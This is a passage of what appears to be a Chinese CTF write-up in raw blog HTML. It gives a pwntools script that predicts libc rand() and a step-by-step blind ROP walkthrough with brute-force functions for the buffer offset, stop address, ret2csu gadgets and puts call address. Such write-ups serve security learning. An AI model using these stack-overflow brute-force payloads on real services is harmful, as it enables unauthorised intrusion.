src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-702\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7535\u8111\u731c\u62f3\u903b\u8f91<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-49.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"477\" height=\"120\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-49.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-703\"  sizes=\"auto, (max-width: 477px) 100vw, 477px\" \/><\/div><\/figure>\n\n\n\n<p>\u77f3\u5934\u526a\u5200\u5e03\u80dc\u5229\u6761\u4ef6 \u9700 return 1<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-50-1024x191.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"191\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-50-1024x191.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-704\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import * &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>from ctypes import *<br>\u200b<br>libcc = CDLL(\"\/lib\/x86_64-linux-gnu\/libc.so.6\")<br>libcc.srand.argtypes = 
&#91;c_uint]<br>libcc.srand(libcc.time(0))<br>\u200b<br>io = remote(\"ctf.ctbu.edu.cn\",33134) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br>\u200b<br>for i in range(100):<br> &nbsp; &nbsp;number = libcc.rand()<br> &nbsp; &nbsp;if number % 3 == 0:<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendlineafter(\"Paper):\",\"2\")<br> &nbsp; &nbsp;if number % 3 == 1:<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendlineafter(\"Paper):\",\"0\")<br> &nbsp; &nbsp;if number % 3 == 2:<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendlineafter(\"Paper):\",\"1\")<br>\u200b<br>io.interactive() &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u9ed1\u76d2\u6d4b\u8bd5<\/h3>\n\n\n\n<p>\u8003\u70b9\u662fBROP\uff0c\u901a\u8fc7\u6d4b\u504f\u79fb\u5e76\u628a\u9644\u4ef6dump\u4e0b\u6765\uff0c\u8fdb\u800c\u5229\u7528\u6f0f\u6d1egetshell\u7684\u4e00\u9053\u7ecf\u5178\u4f8b\u9898<\/p>\n\n\n\n<p>\u901a\u8fc7\u7a0b\u5e8f\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u77e5\u9053\uff0c\u8f93\u5165\u77ed\u5b57\u7b26\u4e32\u548c\u957f\u5b57\u7b26\u4e32\u5f97\u5230\u7684\u7ed3\u679c\u662f\u4e0d\u4e00\u6837\u7684\uff0c\u7ed3\u5408\u9898\u76ee\u6240\u7ed9\u63d0\u793a\uff0c\u53ef\u4ee5\u770b\u5230\u662f\u6ca1\u6709canary\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Arch: &nbsp; &nbsp; &nbsp; amd64-64-little<br>RELRO: &nbsp; &nbsp;  Partial RELRO<br>Stack: &nbsp; &nbsp;  No canary found<br>NX: &nbsp; &nbsp; &nbsp; &nbsp; NX enabled<br>PIE: &nbsp; &nbsp; &nbsp;  No PIE (0x400000)<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u53ef\u4ee5\u63a8\u65ad\u7684\u662f\uff0c\u6709\u4e00\u4e2a\u51fd\u6570 (\u5047\u8bbe\u4e3amain) \u8c03\u7528\u4e86\u4e00\u4e2a\u51fd\u6570 (\u5047\u8bbe\u4e3avuln) \uff0cvuln\u51fd\u6570\u4e2d\u6709\u8f93\u5165\u51fd\u6570\uff0c\u8fc7\u957f\u7684\u5b57\u7b26\u4e32\u4f1a\u6ea2\u51fa\u4fee\u6539\u5230\u8fd4\u56de\u5730\u5740\u8fdb\u800c\u65e0\u6cd5\u6b63\u5e38\u8f93\u51fa &#8220;Okay, bye!&#8221; \uff0c\u53ef\u4ee5\u63a8\u65ad\u51faputs( &#8220;Okay, 
bye!&#8221;)\u662f\u5728main\u51fd\u6570\u4e2d\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-51.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"998\" height=\"414\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-51.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-705\"  sizes=\"auto, (max-width: 998px) 100vw, 998px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\u662fputs\u51fd\u6570? 
\u56e0\u4e3a\u7f16\u8bd1\u5668\u4f1a\u81ea\u52a8\u4f18\u5316\u8f93\u51fa\u51fd\u6570<\/p>\n\n\n\n<p>\u5047\u8bbec\u8bed\u8a00\u7a0b\u5e8f\u4e2d\u7684\u8f93\u51fa\u51fd\u6570\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>printf(\"abc\\n\");<br>puts(\"cde\");<\/code><\/pre>\n\n\n\n<p>\u90a3\u4e48\u7f16\u8bd1\u5668\u4f1a\u81ea\u52a8\u4f18\u5316\u4e3a\uff0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>puts(\"abc\"); \/\/puts\u81ea\u5e26\u4e00\u4e2a\u6362\u884c\u7b26<br>puts(\"cde\");<\/code><\/pre>\n\n\n\n<p>\uff08\u5f53\u7136\u4e5f\u53ef\u80fd\u662fwrite\u51fd\u6570\uff0cwrite\u51fd\u6570\u76f8\u5bf9\u590d\u6742\u4e00\u70b9\uff0c\u4f46\u8fd8\u662f\u53ef\u4ee5\u505a\u7684\uff0c\u4f46\u662f\u9898\u76ee\u80af\u5b9a\u662f\u6309\u7b80\u5355\u7684\u6765\u5bf9\u5427\u3002\u3002\u3002\uff09<\/p>\n\n\n\n<p>\u800c\u4e14\u4e5f\u53ef\u4ee5\u5f97\u5230\u4e00\u4e2a\u4fe1\u606f\u662f\uff0c\u6c47\u7f16\u4ee3\u7801\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>main:<br>    ...<br>    call &nbsp; &nbsp;vuln<br> &nbsp; &nbsp;mov &nbsp; &nbsp; edi, offset aOkayBye ; \"Okay, bye!\"<br> &nbsp; &nbsp;call &nbsp; &nbsp;_puts<br> &nbsp;  ...<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\uff0c\u6211\u4eec\u7f16\u5199\u4e00\u4e2a\u51fd\u6570\u7528\u4e8e\u6d4b\u8bd5\u8f93\u5165\u5730\u5740\u4e0e\u8fd4\u56de\u5730\u5740\u7684\u8ddd\u79bb\uff0c\u6d4b\u8bd5\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\u5f97\u591a\u957f\u624d\u4f1a\u8986\u76d6\u5230\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_buffer_size():<br>    for i in range(1,300):<br>        payload = b'a'*i<br>        buffer_size = len(payload)<br>        try:<br>            io = get_io()<br>            io.send(payload)<br>            io.recvuntil(b'Okay, bye!')<br>            io.close()<br>            log.info(\"bad: %d\" % buffer_size)<br>        except :<br>            io.close()<br>            log.info(\"buffer_size: %d\" % (buffer_size-1))<br>            return 
buffer_size-1<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u504f\u79fb136<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"912\" height=\"339\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-706\"  sizes=\"auto, (max-width: 912px) 100vw, 912px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0b\u4e00\u6b65\uff0c\u6784\u9020payload\uff0c\u6d4b\u8bd5main\u51fd\u6570\u5927\u6982\u7684\u5730\u5740<\/p>\n\n\n\n<p>\u6211\u4eec\u77e5\u9053\u7684\u662f\uff0c\u5982\u679c\u5c06\u8fd4\u56de\u5730\u5740\u4fee\u6539\u4e3amain\u51fd\u6570\u7684\u8bdd\uff0c\u90a3\u4e48\uff0c\u7a0b\u5e8f\u5e76\u4e0d\u4f1a\u5f02\u5e38\u9000\u51fa\uff0c\u800c\u662f\u4f1a\u8fd4\u56demain\u51fd\u6570\uff0c\u76f8\u5f53\u4e8e\u91cd\u65b0\u6267\u884c\u4e00\u6b21\u7a0b\u5e8f\uff0c\u6240\u4ee5\uff0c\u901a\u8fc7\u7206\u7834\u7684\u65b9\u6cd5\uff0c\u4ece\u57fa\u57400x400000\u5904\u5f00\u59cb\u7206\u7834\uff0c\u6784\u9020payload\uff0c\u8bbe\u7f6eaddr\u4ece0x400000\u5f00\u59cb\u9012\u589e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = b'a' * buffer_size + 
p64(addr)<\/code><\/pre>\n\n\n\n<p>\u4f46\u662f\uff0c\u5982\u679c\u4f60\u81ea\u5df1\u53bb\u7f16\u8bd1\u4e00\u4e2ademo\u7a0b\u5e8f\u6765\u8f85\u52a9\u5224\u65ad\u504f\u79fb\u7684\u8bdd\uff0c\u53ef\u4ee5\u6781\u5927\u7684\u7f29\u77ed\u7206\u7834\u65f6\u95f4<\/p>\n\n\n\n<p>\u56e0\u6b64\uff0c\u6211\u9009\u53d6\u7684\u5730\u5740\u662f0x400500\uff0c\u8fd8\u6709\u4e00\u4e2a\u5c0f\u7ec6\u8282\u662f\uff0cstart\u51fd\u6570\u4e0emain\u51fd\u6570\u76f8\u6bd4\uff0cstart\u7684\u5730\u5740\u66f4\u4f4e\u4e00\u70b9\uff0c\u5982\u679c\u901a\u8fc7\u7a0b\u5e8f\u8fd4\u56de\u7684\u5b57\u7b26\u4e32 &#8220;Welcome to the BROP challenge!&#8221; \u6765\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u6210\u529f\u8fd4\u56demain\u51fd\u6570\u7684\u8bdd\uff0c\u504f\u5dee\u4f1a\u6bd4\u8f83\u5927\uff0c\u56e0\u4e3amain\u51fd\u6570\u662fstart\u51fd\u6570\u8c03\u7528\u7684\uff0c\u6267\u884c\u5230start\u51fd\u6570\u540c\u6837\u662f\u4f1a\u8fd4\u56demain\u51fd\u6570\u7684\uff0c\u8fd9\u6837\u7684\u8bdd\uff0cmain\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u5c31\u4e0d\u597d\u786e\u5b9a\uff0c\u8f93\u51fa\u51fd\u6570\u5982 call puts \u7684\u5730\u5740\u4e5f\u4e0d\u597d\u786e\u5b9a<\/p>\n\n\n\n<p>\u56e0\u6b64\u6211\u8fd9\u91cc\u9009\u5219&#8221;Okay, bye!&#8221; \u6765\u5224\u65ad\uff0c\u5e76\u8bbe\u7f6e\u4e00\u4e2a\u8d85\u65f6\u6765\u9632\u6b62\u7a0b\u5e8f\u5361\u5728read\u51fd\u6570\u91cc\uff0c\u8fd9\u6837\u7684\u8bdd\uff0c\u5c31\u80fd\u66f4\u7cbe\u51c6\u7684\u5f97\u5230main\u51fd\u6570\u7684\u5927\u6982\u5730\u5740\uff0c\u5373\u524d\u9762\u63d0\u5230\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>main:<br>\t...<br>\tcall    vuln<br>    mov     edi, offset aOkayBye ; \"Okay, bye!\"<br>    call    _puts<br>    ...<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u4e00\u6b65\u7684\u7206\u7834\u51fd\u6570\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_stop_addr(buffer_size):<br>    addr = 0x400500<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr)<br>        
try:<br>            io = get_io()<br>            io.sendline(payload)<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' in response:<br>                io.close()<br>                log.info(\"stop address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u5730\u57400x4006c4<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"914\" height=\"342\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-707\"  sizes=\"auto, (max-width: 914px) 100vw, 914px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0b\u4e00\u6b65\uff0c\u5bfb\u627egadgets\uff0c\u8fd9\u4e00\u6b65\u6d89\u53ca\u5230ret2csu\u7684\u77e5\u8bc6\u70b9\uff0c\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n<p>__libc_csu_init \u51fd\u6570\u5b58\u5728\u8fd9\u4e48\u4e00\u6bb5\u6c47\u7f16\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-54.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"261\" height=\"180\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-54.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-708\"\/><\/div><\/figure>\n\n\n\n<p>\u4ec0\u4e48\u610f\u601d\u5462\uff0c\u5c316\u4e2apop\u5457\uff0c\u8fd9\u91cc\u9762\u6709\u4ec0\u4e48\u5462<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pop r15  -----&gt;  \"\\x41\\x5F\"<br>\u800c<br>pop rdi  -----&gt;  \"\\x5F\"<\/code><\/pre>\n\n\n\n<p>\u5c31\u662f\u8bf4\uff0c\u5982\u679c\u6211\u4eec\u80fd\u6d4b\u51fa\u8fd9\u4e00\u6bb5gadgets\u7684\u5730\u5740\uff0c\u90a3\u4e48\u5c31\u76f8\u5f53\u4e8e\u6211\u4eec\u77e5\u9053\u4e86pop_rdi\u7684\u5730\u5740\uff0c\u4ece\u800c\u53ef\u4ee5\u8bbe\u7f6eputs\u7684\u53c2\u6570<\/p>\n\n\n\n<p>\u5982\u4f55\u6d4b\uff1f\u76f8\u5f53\u4e8e\u6211\u4eec\u8981\u8ba9\u8fd9\u4e00\u6bb5gadgets\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\uff0c\u6784\u9020payload\u5982\u4e0b\uff0c\u5982\u679c\u7a0b\u5e8f\u6210\u529f\u6267\u884c\u4e86\u8fd9\u4e00\u6761payload\uff0c\u7a0b\u5e8f\u5c06\u8f93\u51fa \u201cOkay, bye!\u201d<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">payload = b'a' * buffer_size + p64(addr) + p64(1)*6 + 
p64(stop_addr)<\/pre>\n\n\n\n<p>stop_addr\u5730\u5740\u5c31\u662f\u4e0a\u4e00\u4e2a\u51fd\u6570\u7206\u7834\u7684\u6765\u76840x4006c4<\/p>\n\n\n\n<p>addr\u4ece0x4006d0\u5f00\u59cb\u9012\u589e\uff0c\u4e3a\u4ec0\u4e48\u662f0x4006d0\uff1f\u56e0\u4e3a__libc_csu_init\u51fd\u6570\u662f\u5728\u6211\u4eec\u7f16\u5199\u7684\u51fd\u6570\u540e\u9762\u7684\uff0c\u4e5f\u5c31\u662f\u66f4\u9ad8\u7684\u5730\u5740\uff0c\u6240\u4ee5\u6211\u4eec\u5b8c\u5168\u53ef\u4ee5\u4ece0x4006c4\u7684\u540e\u9762\u5f00\u59cb\u6d4b\u8bd5\uff0c\u6240\u4ee5\u5c31\u968f\u4fbf\u9009\u4e86\u4e2a0x4006d0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-44.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"507\" height=\"518\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-44.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-698\"  sizes=\"auto, (max-width: 507px) 100vw, 507px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5\u7206\u7834gadgets\u7684\u51fd\u6570\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_gadgets_addr(stop_addr, buffer_size):<br>    addr = 0x4006d0<br>    while True:<br>        addr += 1<br>        payload = b'a' * buffer_size + p64(addr) + p64(1)*6<br>        try:<br>            io = get_io()<br>            io.sendline(payload + p64(stop_addr))<br>            response = io.recvuntil(b'Okay, bye!', timeout=2)<br>            if b'Okay, bye!' 
in response:<br>                io.close()<br>                log.info(\"gadgets address: 0x%x\" % addr)<br>                return addr<br>            else:<br>                io.close()<br>                log.info(\"bad: 0x%x - no message\" % addr)<br>        except Exception as e:<br>            try:<br>                io.close()<br>            except:<br>                pass<br>            log.info(\"bad: 0x%x - error: %s\" % (addr, str(e)))<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230gadgets\u7684\u5730\u5740\u4e3a0x40075a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"903\" height=\"372\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-697\"  sizes=\"auto, (max-width: 903px) 100vw, 903px\" \/><\/div><\/figure>\n\n\n\n<p>\u90a3\u4e48 pop rdi \u7684\u5730\u5740\u5c31\u7b49\u4e8e 0x40075a + 9\uff0cpop rdi \u7684\u5730\u5740\u77e5\u9053\u4e86\u63a5\u4e0b\u6765\u5c31\u662f\u6d4b\u8bd5call puts\u7684\u771f\u6b63\u5730\u5740\u4e86<\/p>\n\n\n\n<p>\u5bf9\u4e8e\u524d\u9762\u7684\u6c47\u7f16\u4ee3\u7801\uff0c\u6211\u4eec\u66f4\u591a\u7684\u53ea\u662f\u63a8\u6d4b\uff0c\u8981\u60f3\u5f97\u5230call puts 
\u7684\u771f\u6b63\u5730\u5740\uff0c\u8fd8\u9700\u8981\u6784\u9020\u7279\u5b9a\u8f93\u51fa\uff0c\u6211\u4eec\u77e5\u9053\uff0celf\u6587\u4ef6\u5f00\u5934\u7684\u56db\u4e2a\u5b57\u8282\u5fc5\u7136\u662f &#8220;\\x7fELF&#8221;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-42-1024x154.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"154\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-42-1024x154.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-696\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6211\u4eec\u8fd8\u77e5\u9053\u53ef\u4ee5\u8c03\u7528\u5230puts( &#8220;Okay, bye!&#8221;)\u7684\u5730\u5740\u4e3a0x4006c4\uff0c\u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u4ece0x4006c4\u5f00\u59cb\u6d4b\u8bd5\uff0c\u6784\u9020payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = b'a' * buffer_size + p64(gadget_addr + 9) + p64(0x400000) + p64(addr)<\/code><\/pre>\n\n\n\n<p>addr\u4ece0x4006c4\u5f00\u59cb\u9012\u589e\uff0c\u5982\u679caddr\u4e3acall puts\u7684\u5730\u5740\uff0c\u90a3\u4e48\u7a0b\u5e8f\u4f1a\u8f93\u51fa&#8221;\\x7fELF&#8221;<\/p>\n\n\n\n<p>\u6545\u7206\u7834\u51fd\u6570\u5982\u4e0b\uff0c\u8fd9\u4e00\u6b65\u662f\u6700\u5feb\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>def get_puts_call_addr(buffer_size, gadget_addr):<br>    addr = 0x4006c4<br>    while True:<br>        addr += 1<br>     
   payload = b'a' * buffer_size <br>        payload += p64(gadget_addr + 9) + p64(0x400000)<br>        payload += p64(addr)<br>        try:<br>            p = get_io()<br>            p.sendline(payload)<br>            p.recvuntil(b'\\x7fELF')<br>            log.info(\"puts address: 0x%x\" % addr)<br>            p.close()<br>            return addr<br>        except:<br>            p.close()<br>            log.info(\"bad: 0x%x\" % addr)<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230call puts\u7684\u5730\u5740 0x4006c9<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"903\" height=\"345\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-41.png\" 